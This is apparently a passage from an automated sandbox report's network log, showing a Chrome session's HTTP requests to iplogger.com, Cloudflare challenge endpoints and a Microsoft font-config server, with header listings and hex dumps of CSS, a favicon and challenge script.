                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC1369INData Raw: 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62
                                                                                                                                                                                                                                                Data Ascii: %;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-web
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC1369INData Raw: 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74
                                                                                                                                                                                                                                                Data Ascii: ght:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;st
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e
                                                                                                                                                                                                                                                Data Ascii: allenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challen
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC1369INData Raw: 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70
                                                                                                                                                                                                                                                Data Ascii: dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC1369INData Raw: 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65
                                                                                                                                                                                                                                                Data Ascii: ,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-dasharray:166;stroke-dashoffse
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC1369INData Raw: 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c
                                                                                                                                                                                                                                                Data Ascii: n:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-start;display:flex;flex-flow:col
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC1369INData Raw: 72 74 6c 7d 2e 72 74 6c 20 2e 63 62 2d 6c 62 2d 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78
                                                                                                                                                                                                                                                Data Ascii: rtl}.rtl .cb-lb-t{margin-left:0;margin-right:8px;padding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC1369INData Raw: 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c
                                                                                                                                                                                                                                                Data Ascii: challenge-error-title a{color:#232323}#challenge-error-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#chall


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                15192.168.2.649740104.21.76.574436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC474OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1787772256:1727962003:iWCRLIu4ZygN5hNL9RXktFOgCDxm7GLFIz5ri-9QP5c/8ccd8274b9e442c9/79895931bf779a4 HTTP/1.1
                                                                                                                                                                                                                                                Host: iplogger.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC668INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:26 GMT
                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                cf-chl-out: 9YAxSII5M+ZAtE8iVLmbHaqnKrSzBArxjt8=$h6/2OtBz6jJ2qovu
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PL11DEF35axLvu1e4nXFHkYZwCyzHamE15DPr%2B97hhyZDFnMfT1gKdsriaOL12CqmHw4oPC9DGjmeGh7yQGQdui%2B1jdBZvv5sT54PrrKEfbgS8VMFc7ig56pfI1Ls14%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd828e6ebb78db-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                Data Ascii: invalid


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                16192.168.2.649738184.28.90.27443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                Range: bytes=0-2147483646
                                                                                                                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC514INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                X-CID: 11
                                                                                                                                                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                Cache-Control: public, max-age=25941
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:26 GMT
                                                                                                                                                                                                                                                Content-Length: 55
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                X-CID: 2
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                17192.168.2.649739104.21.76.574436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC347OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                Host: iplogger.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC848INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:26 GMT
                                                                                                                                                                                                                                                Content-Type: image/x-icon
                                                                                                                                                                                                                                                Content-Length: 2833
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                                                                                                                                                                                                etag: "629f3a26-b11"
                                                                                                                                                                                                                                                strict-transport-security: max-age=604800
                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                Age: 4195
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8QZ0N5GYE%2FQjzGUJlP62kh8Njave9zbqER%2BeJnNlnXQEFViktq7fh2msQPW%2BH7EOrMbGiERjfuF5tX%2Fjmt91iBNAC1V76eA1aIGOMD%2Fz9L%2BGU3Kj4C%2BIDjDLNXyDzbQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd828eeab541e1-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC521INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa
                                                                                                                                                                                                                                                Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC1369INData Raw: 39 42 e7 01 b7 b7 64 4a 70 18 d8 03 bc 05 fc cb 7c 07 f1 f6 ae 40 dc e4 4f 00 9f 05 8e a7 22 6a 65 e0 90 a1 6f 47 4c a0 1b 31 ec 00 9e 8c e5 f4 e7 52 21 35 5c eb a6 9a 51 87 37 9d 0f 01 7f c1 04 2e 4d 62 02 78 1e 78 04 d8 05 1c 29 45 83 75 09 62 39 ed 41 64 f9 3c a0 0b 78 0a 38 08 4c 21 a7 a6 0b 38 13 b8 06 61 56 23 bc 0a 7c 3e 15 52 13 b3 fd 39 2b 03 bc e9 bc 0f 09 50 1a 1e a1 1a 98 04 7e 09 dc 5e 8a 06 f7 3b 3f fa 23 71 90 e3 b9 14 d9 c9 0e 64 87 47 80 61 60 a4 98 49 b8 f2 f5 63 39 dd 06 5c 0a dc 43 63 27 2c 09 6c 9d 2d ca ac c5 80 eb cd c0 cd e0 6d e4 48 ef 2e 45 83 ce a2 bb 81 0b 80 73 11 73 b5 98 e9 3a a0 6c 3e c3 c0 d5 c5 4c e2 05 00 ad 75 1b b2 db 67 23 51 e4 08 30 00 3c a5 94 1a 33 9a 7e 3d 62 9a eb b9 c5 93 c0 da 54 48 ed 99 f9 c7 87 18 e0 4d e7
                                                                                                                                                                                                                                                Data Ascii: 9BdJp|@O"jeoGL1R!5\Q7.Mbxx)Eub9Ad<x8L!8aV#|>R9+P~^;?#qdGa`Ic9\Cc',l-mH.Ess:l>Lug#Q0<3~=bTHM
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC943INData Raw: 16 cf 00 17 15 33 89 f1 64 41 2f 46 8a 30 8e f3 f3 0e 70 03 b0 b3 3f a0 ca 00 b1 9c 3e 09 29 f2 9e 5c 35 c6 86 54 48 cd 7a 02 40 7a 80 6c cd da c5 c0 ad 46 1f ec 07 c2 08 97 5b 89 32 f0 03 60 a3 59 7c 07 f0 24 d3 3d bf e3 11 e6 3f 99 2c e8 95 c9 82 26 15 52 bb 81 53 80 8b 90 5d 1f 02 9e ab 1e 78 26 03 f6 21 b6 dd 16 97 63 62 84 62 26 f1 1e 70 16 92 d9 6d 45 3b eb 7e e0 4b c0 b7 8b 99 c4 64 b2 a0 bb 80 67 99 bd 4d cf 83 e4 fc ff 0a dc 9e 2c e8 2e a3 1f d2 48 0a 6c 93 c9 1c 1d c5 6c e5 f1 15 88 97 e4 36 de 9f 00 ce 2e 45 83 bb 7a 07 46 3d 80 2f 1b ee 9c 00 30 85 d2 9b 90 82 ab 6d b9 fd 00 f0 43 e0 a1 62 26 71 04 20 59 d0 3d 88 b2 76 eb f2 1e 44 aa d4 a9 fe c0 ec 4d d6 b5 1a 24 6e c6 5d 6f 90 d3 df f3 70 e8 e3 8b 41 3a 36 6e 40 52 da bb b2 e1 4e a7 41 22 80
                                                                                                                                                                                                                                                Data Ascii: 3dA/F0p?>)\5THz@zlF[2`Y|$=?,&RS]x&!cbb&pmE;~KdgM,.Hll6.EzF=/0mCb&q Y=vDM$n]opA:6n@RNA"


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                18192.168.2.649742104.18.95.414436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:27 UTC731OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccd8289bc184228&lang=auto HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ha9g5/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:27 UTC301INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:27 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 114951
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd8294ec948c12-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:27 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65
                                                                                                                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
